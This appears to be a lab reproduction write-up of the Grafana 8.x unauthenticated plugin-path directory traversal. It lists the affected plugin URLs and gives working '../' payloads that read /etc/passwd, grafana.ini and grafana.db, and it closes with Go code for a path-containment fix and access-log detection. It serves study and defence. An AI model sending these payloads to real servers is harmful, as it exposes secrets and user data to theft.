Grafana is a cross-platform, open-source data visualization web application. Once a user configures its data sources, Grafana can display charts and alerts in a web browser.
An unauthenticated attacker can exploit this vulnerability to obtain sensitive files from the server.
The vulnerability is a directory traversal in Grafana's plugin handling that leads to arbitrary file reads: the endpoint that serves plugin files requires no authentication and does not sanitize the requested file path, so "../" sequences can traverse out of the plugin directory and read arbitrary files on the system.
Affected versions: Grafana 8.0.0 - 8.3.0
Reproduction
Lab environment: vulhub
docker-compose up -d  # start the container
Open port 3000 in a browser; the Grafana login page appears.
Capture the request for this page with Burp Suite.
The PoC is built from one of the affected plugins listed below.
Affected plugin list published upstream:
<grafana_host_url>/public/plugins/alertlist/
<grafana_host_url>/public/plugins/annolist/
<grafana_host_url>/public/plugins/barchart/
<grafana_host_url>/public/plugins/bargauge/
<grafana_host_url>/public/plugins/candlestick/
<grafana_host_url>/public/plugins/cloudwatch/
<grafana_host_url>/public/plugins/dashlist/
<grafana_host_url>/public/plugins/elasticsearch/
<grafana_host_url>/public/plugins/gauge/
<grafana_host_url>/public/plugins/geomap/
<grafana_host_url>/public/plugins/gettingstarted/
<grafana_host_url>/public/plugins/grafana-azure-monitor-datasource/
<grafana_host_url>/public/plugins/graph/
<grafana_host_url>/public/plugins/heatmap/
<grafana_host_url>/public/plugins/histogram/
<grafana_host_url>/public/plugins/influxdb/
<grafana_host_url>/public/plugins/jaeger/
<grafana_host_url>/public/plugins/logs/
<grafana_host_url>/public/plugins/loki/
<grafana_host_url>/public/plugins/mssql/
<grafana_host_url>/public/plugins/mysql/
<grafana_host_url>/public/plugins/news/
<grafana_host_url>/public/plugins/nodeGraph/
<grafana_host_url>/public/plugins/opentsdb/
<grafana_host_url>/public/plugins/piechart/
<grafana_host_url>/public/plugins/pluginlist/
<grafana_host_url>/public/plugins/postgres/
<grafana_host_url>/public/plugins/prometheus/
<grafana_host_url>/public/plugins/stackdriver/
<grafana_host_url>/public/plugins/stat/
<grafana_host_url>/public/plugins/state-timeline/
<grafana_host_url>/public/plugins/status-history/
<grafana_host_url>/public/plugins/table/
<grafana_host_url>/public/plugins/table-old/
<grafana_host_url>/public/plugins/tempo/
<grafana_host_url>/public/plugins/testdata/
<grafana_host_url>/public/plugins/text/
<grafana_host_url>/public/plugins/timeseries/
<grafana_host_url>/public/plugins/welcome/
<grafana_host_url>/public/plugins/zipkin/
The demonstration below uses gauge; the payload is appended to the path of the captured GET request.
# read /etc/passwd
/public/plugins/gauge/../../../../../../../../../etc/passwd
# read the Grafana configuration file
/public/plugins/gauge/../../../../../../../../../../../../../../../etc/grafana/grafana.ini
# read the Grafana database
/public/plugins/gauge/../../../../../../../../../../../../../../../var/lib/grafana/grafana.db
Remediation
Installations running an affected version should upgrade immediately.
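As an added example (not part of the original post and not Grafana's own code), the following Go program shows the containment check the unauthenticated plugin-file handler was missing, and applies the same check to access-log lines so the requests shown above can be detected after the fact. The plugin root /var/lib/grafana/plugins is an assumed install location and the log lines are constructed.

```go
package main

import (
	"errors"
	"fmt"
	"path"
	"strings"
)

var ErrTraversal = errors.New("request does not resolve to a file below its plugin directory")
// ResolvePluginAsset is the check the unauthenticated asset handler lacked: join and clean,
// then verify the result still lies below <pluginsRoot>/<pluginID>/ (URL-style paths, so "path").
func ResolvePluginAsset(pluginsRoot, pluginID, asset string) (string, error) {
	base := path.Join(pluginsRoot, pluginID)
	candidate := path.Join(base, asset) // Join cleans the result, collapsing every ".."
	if !strings.HasPrefix(candidate, base+"/") {
		return "", ErrTraversal
	}
	return candidate, nil
}

// ScanAccessLog runs the same check over combined-format access log lines and returns
// the request paths under /public/plugins/ that escape their plugin directory.
func ScanAccessLog(pluginsRoot string, lines []string) []string {
	var hits []string
	for _, line := range lines {
		f := strings.Fields(line) // combined format: field 6 is the request path
		if len(f) < 7 || !strings.HasPrefix(f[6], "/public/plugins/") {
			continue
		}
		id, asset, _ := strings.Cut(strings.TrimPrefix(f[6], "/public/plugins/"), "/")
		if _, err := ResolvePluginAsset(pluginsRoot, id, asset); errors.Is(err, ErrTraversal) {
			hits = append(hits, f[6])
		}
	}
	return hits
}

// SampleLog is constructed input: one normal module load, then two payloads from the post.
var SampleLog = []string{
	`10.0.0.5 - - [07/Dec/2021:10:00:01 +0000] "GET /public/plugins/gauge/module.js HTTP/1.1" 200 812`,
	`10.0.0.9 - - [07/Dec/2021:10:00:02 +0000] "GET /public/plugins/gauge/../../../../../../../../../etc/passwd HTTP/1.1" 200 1406`,
	`10.0.0.9 - - [07/Dec/2021:10:00:03 +0000] "GET /public/plugins/gauge/../../../../../../../../../../../../../../../var/lib/grafana/grafana.db HTTP/1.1" 200 90112`,
}

func main() {
	// "/var/lib/grafana/plugins" is an assumed plugin root; only the prefix check depends on it.
	for _, p := range ScanAccessLog("/var/lib/grafana/plugins", SampleLog) {
		fmt.Println("traversal attempt:", p)
	}
}
```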